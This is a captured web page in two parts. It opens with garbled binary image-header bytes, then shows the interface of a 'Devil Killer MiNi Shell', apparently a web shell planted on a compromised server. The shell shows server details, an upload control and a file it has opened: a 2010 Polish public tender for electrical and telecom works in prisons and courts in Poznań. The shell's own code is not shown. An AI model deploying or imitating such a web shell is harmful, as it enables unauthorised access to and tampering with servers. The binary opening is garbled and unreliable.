JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100917/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100917/296936-N-2010.html

<p class="kh_header"><b>Poznań: Roboty elektryczne i teletechniczne w budynkach, obiektach i na terenach zajmowanych przez państwowe i samorządowe jednostki organizacyjne, jednostki organizacyjne Skarbu Państwa, w szczególności na terenach i w obiektach więziennych, prokuratury i sądów</b><br>
<b>Numer ogłoszenia: 296936 - 2010; data zamieszczenia: 17.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zawarcia umowy ramowej.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gospodarstwo Pomocnicze - Zakład Remontowo-Budowlany przy Areszcie Śledczym w Poznaniu , ul. Młyńska 1, 61-729 Poznań, woj. wielkopolskie, tel. 061 8524198, faks 061 8524198.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gpzrb.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Skarbu Państwa nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty elektryczne i teletechniczne w budynkach, obiektach i na terenach zajmowanych przez państwowe i samorządowe jednostki organizacyjne, jednostki organizacyjne Skarbu Państwa, w szczególności na terenach i w obiektach więziennych, prokuratury i sądów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest wykonywanie   robót instalacyjnych teletechnicznych i instalacyjnych elektrycznych przez okres 3 lat od daty zawarcia     umowy   w budynkach, obiektach i na terenach zajmowanych przez państwowe i samorządowe  jednostki organizacyjne, jednostki organizacyjne Skarbu Państwa, w szczególności  na terenach i w obiektach więziennych, prokuratury i sądów z przewagą  robót wykonywanych  w obiektach więziennych i sądach na terenie Polski. 
W przypadku realizacji robót  w funkcjonujących obiektach więziennych  , Wykonawca musi brać pod uwagę obostrzenia wynikające ze specyfikacji  tych obiektów, w szczególności dłuższy niż normatywny czas transportu wewnętrznego  itp.
 Roboty wykonane będą generalnie z materiałów dostarczonych  przez Wykonawcę , jednak Zamawiający zastrzec może w umowie definitywnej  dostawę własnych materiałów lub wskazać źródło ich odbioru.Szczegółowy opis przedmiotu zamówienia podano w załączniku nr A oraz B dołączonej  do niniejszej Specyfikacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga od Wykonawców wniesienia wadium w Wysokości 50 000 zł       (słownie : pięćdziesiąt tysięcy złotych).WADIUM MOŻE BYĆ WNIESIONE W JEDNEJ LUB KILKU FORMACH OKREŚLONYCH W ART.45 UST. 6 USTAWY PZP:  
	
A)  W PIENIĄDZU - NALEŻY PRZELAĆ NA RACHUNEK ZAMAWIAJĄCEGO 
        BANK ZACHODNI WBK S.A. VI ODDZIAŁ POZNAŃ  72 1090 1362 0000 0000 3601 7993

Z ADNOTACJĄ:
WADIUM - NR SPRAWY: ZRB.220.46.2010 - PRZETARG NIEOGRANICZONY NA REALIZACJĘ ZADANIA P.N. Roboty elektryczne i teletechniczne w budynkach, obiektach i na terenach zajmowanych przez państwowe i samorządowe jednostki organizacyjne, jednostki organizacyjne Skarbu Państwa, w szczególności na terenach i w obiektach więziennych, prokuratury i sądów - OZNACZA UZNANIE KWOTY WADIUM NA RACHUNKU ZAMAWIAJĄCEGO.

B) W PORĘCZENIACH BANKOWYCH LUB PORĘCZENIACH SPÓŁDZIELCZEJ KASY OSZCZĘDNOŚCIOWO-KREDYTOWEJ, 
     Z TYM ŻE PORĘCZENIE KASY JEST ZAWSZE PORĘCZENIEM PIENIĘŻNYM,
C)  W GWARANCJACH BANKOWYCH,
D)  W GWARANCJACH UBEZPIECZENIOWYCH,
E)  W PORĘCZENIACH UDZIELANYCH PRZEZ PODMIOTY, O KTÓRYCH MOWA W ART. 6B UST. 5 PKT 2 USTAWYZDNIA9 LISTOPADA 2000 R. O UTWORZENIU POLSKIEJ AGENCJI ROZWOJU PRZEDSIĘBIORCZOŚCI (TEKST JEDNOLITY DZ. U.  Z 2007 R. NR 42, POZ. 275 Z PÓŹN. ZM.).

 W PRZYPADKU WYBORU INNEJ NIŻ PIENIĄDZ FORMY WNIESIENIA WADIUM, WYKONAWCA ZOBOWIĄZANY JEST     ZŁOŻYĆ W SIEDZIBIE GPZRB WADIUM W OSOBNEJ KOPERCIE OPISANEJ: WADIUM - NR SPRAWY:ZRB.220.46.2010-  PRZETARG NIEOGRANICZONY NA REALIZACJĘ ZADANIA P.N. 
Roboty elektryczne i teletechniczne w budynkach, obiektach i na terenach zajmowanych przez państwowe i samorządowe jednostki organizacyjne, jednostki organizacyjne Skarbu Państwa, w szczególności na terenach i w obiektach więziennych, prokuratury i sądów.Wadium musi być wniesione przed terminem składania ofert, 

13.3 Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 ust. 1 
        Ustawy z dnia  29 stycznia  2004  Prawo zamówień publicznych  (Dz. U. z 2010r , Nr 113 poz. 759). Zasady zwrotu wadium:

	Wadium wniesione w pieniądzu Zamawiający zwróci, zgodnie z art. 46 ust. 4 ustawy PZP wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono   przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy 
na rachunek bankowy wskazany przez wykonawcę.
	Zgodnie z art. 46 ust.1 ustawy, wadium zostanie zwrócone niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem wykonawcy którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem art. 46 ust. 4a ustawy PZP. 
	Zgodnie z art. 46 ust 1a ustawy PZP, wadium zostanie zwrócone niezwłocznie wykonawcy, którego oferta została wybrana jako najkorzystniejsza po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
	Zgodnie z art. 46 ust. 2 ustawy PZP, wadium zostanie zwrócone niezwłocznie na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
	Zgodnie z art. 46 ust. 3 ustawy PZP Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art.46 ust.1 ustawy PZP, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. Utrata wadium

	   Zgodnie z zastrzeżeniem art. 46 ust.4a ustawy PZP Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3    ustawy PZP, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 ustawy PZP, lub pełnomocnictw, chyba  że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
	
	   W przypadkach określonych w art. 46 ust. 5 ustawy PZP Zmawiający zatrzymuje wadium 
   wraz z odsetkami jeżeli Wykonawca, którego oferta została wybrana:
	   1) odmówił podpisania umowy w sprawie  zamówienia publicznego na warunkach określonych 
        w ofercie.
	   2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
	   3)  zawarcie umowy w sprawie  zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów, wymienionych w pkt.5.Nie wykazanie spełniania ww. warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww. warunku, jeżeli Wykonawca wykaże, że w ciągu  ostatnich 3 lat zrealizował  co najmniej  trzy podobne
zadania odpowiadające swoim  rodzajem  oraz wartością nie mniejszą niż 500 000 zł brutto dla każdego zamówienia, z załączeniem dokumentów potwierdzających, że roboty zostały wykonane należycie ( przez pojęcie podobne zadania Zamawiający rozumie , że Wykonawca zrealizował zamówienie jako generalny  wykonawca lub podwykonawca i wybudował lub zmodernizował lub rozbudował  przynajmniej  jeden obiekt  dla służb więziennych , jeden   dla  sądownictwa , jeden zabytek- załącznik nr 6
Dokument świadczący o należytym wykonaniu zamówienia   powinien  zawierać: zakres  oraz  wartość zrealizowanego zadania , a także adres Inwestora  z podaniem adresu oraz numeru telefonu.
W celu dokonania analizy zgodności ofert z warunkami specyfikacji istotnych warunków zamówienia Zamawiający wymaga wykazu potwierdzającego zdobytą wiedzę i doświadczenie wraz z dokumentami potwierdzającymi należyte wykonanie wyżej określonych zadań tj. referencje lub inne dokumenty.
Nie wykazanie spełniania ww. warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp. 
Wykonawca do swojej oferty musi załączyć: 
- oświadczenie o spełnianiu warunków udziału w postępowaniu(załącznik nr 4do siwz)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca do swojej oferty musi załączyć: 
- oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 4 do siwz)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi udokumentować , że dysponuje potencjałem technicznym (załącznik nr 7 ) dysponuje lub będzie  dysponował osobami zdolnymi do wykonania zamówienia,  które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami szczególności :
1.	Kierownikiem budowy, posiadającym aktualne  uprawnienia budowlane do prowadzenia robót budowlanych bez ograniczeń , przynależnym do Izby Inżynierów  Budownictwa
2.	Kierownikiem  instalacji teletechnicznych i  elektrycznych posiadającym odpowiednie aktualne  uprawnienia zgodnie z zakresem robót  przedstawionym w Załączniku A i B   oraz przynależy do Izby Inżynierów Budownictwa
3.	Osobą posiadającą doświadczenie w realizacji prac przy udziale osób pozbawionych wolności. - Zamawiający uzna za spełnienie ww. warunku, jeżeli Wykonawca  wykaże, że  ww osoba wykonywała zamówienia przy udzielane osób pozbawionych wolności.(dane jednostki kierującej skazanych do pracy, adres oraz numer telefonu, imię nazwisko pracownika, którym dysponuje Wykonawca)
4.	przynajmniej dwie osoby posiadające certyfikat wykonawczy na instalowanie systemów sieci komputerowych,
5.	minimum 2 pracowników z licencją pracownika zabezpieczenia technicznego II stopnia
6.	przynajmniej jedną osobą - posiadającą certyfikat I stopnia autoryzowanego instalatora w zakresie strukturalnych sieci komputerowych
7.	przynajmniej jedną osobą - posiadającą certyfikat autoryzowanego instalatora w zakresie systemów instalowanych zakładach penitencjarnych, a obejmujący jednolity zintegrowany system 	kontroli, dozoru, łączności  oraz zarządzania Zakładem Karnym.
8.	Dokument potwierdzający funkcjonowanie systemu, o którym mowa pkt. 7 w dowolnym zakładzie penitencjarnym  
9.	przynajmniej jedną osobą - posiadającą certyfikat III stopnia w zakresie projektowania strukturalnych sieci komputerowych 
10.	przynajmniej jedną osobą - posiadającą certyfikat autoryzowanego instalatora systemów włamaniowych
11.	przynajmniej jedną osobą - posiadającą Uprawnienia SEP w zakresie instalacji oraz pomiarów instalacji elektrycznych
12.	przynajmniej jedna osobę - posiadającą certyfikat instalatora oferowanego systemu monitoringu
13.	dla certyfikowanych pracowników wymienionych w pkt.4-9 świadectwo poświadczenia bezpieczeństwa do dostępu do informacji 	niejawnych oznaczonych klauzulą POUFNE wraz z zaświadczeniem o przeszkoleniu z zakresu ochrony informacji niejawnych. Certyfikat bezpieczeństwa osobowego.

W celu dokonania analizy zgodności ofert z warunkami specyfikacji istotnych warunków zamówienia Zamawiający wymaga wykazu potwierdzającego zdobytą wiedzę i doświadczenie wraz z dokumentami potwierdzającymi odbyte kursy i szkolenia tzn. kserokopie certyfikatów lub dokumentów równoważnych, potwierdzonych za zgodność z oryginałem, potwierdzające  rodzaj i zakres szkolenia (kursu) zgodny z powyższym wykazem



Zamawiający uzna za spełnienie ww. warunków, jeżeli Wykonawca  wykaże, że w wykonywaniu zamówienia uczestniczyć będą osoby spełniające łącznie powyższe wymagania.

Ocena spełniania ww. warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów, wymienionych w pkt 5 Nie wykazanie spełniania ww. warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złoży oświadczenie  załącznik nr 8, że  znajduje się w sytuacji ekonomicznej  i finansowej zapewniającej wykonanie  zamówienia oraz udokumentuje, że: 
	
1. posiada polisę lub inny dokument ubezpieczenia potwierdzający, że  Wykonawca 
    jest ubezpieczony od odpowiedzialności cywilnej w zakresie  prowadzonej   
    działalności gospodarczej  na kwotę nie mniejszą niż 500.000 zł 
2. posiada środki  obrotowe lub zdolność kredytową w zakresie kredytu  obrotowego o wysokości co najmniej 300.000 zł -wystawione, bądź potwierdzone  za zgodność ze stanem aktualnym przez uprawnionego urzędnika, nie wcześniej niż 3  miesięce przed terminem składania ofert
 Posiada   aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru  lub zgłoszenia do ewidencji działalności gospodarczej, wystawione, bądź potwierdzone za zgodność ze stanem aktualnym przez uprawnionego urzędnika, nie wcześniej niż 6 miesięcy przed terminem składania ofert
 Posiada zaświadczenie  właściwego naczelnika urzędu skarbowego  oraz  właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego   potwierdzających  odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub  społeczne  bądź uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności  lub wstrzymanie w całości wykonania decyzji organu podatkowego . Powyższe zaświadczenia muszą być wystawione, bądź potwierdzone za zgodność ze stanem aktualnym przez uprawnionego urzędnika, nie wcześniej  niż 3 miesiące  przed terminem składania ofert.

Dowód wniesienia wadium przed terminem składania ofert. 

 Wszelkie zaświadczenia bądź dokumenty  mogą być w formie oryginału bądź  kserokopii- (każda strona kopii) muszą być potwierdzone za zgodność z oryginałem i podpisane przez osobę uprawnioną do reprezentowania firmy w obrocie gospodarczym zgodnie z aktem rejestracyjnym i wymogami ustawowymi.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
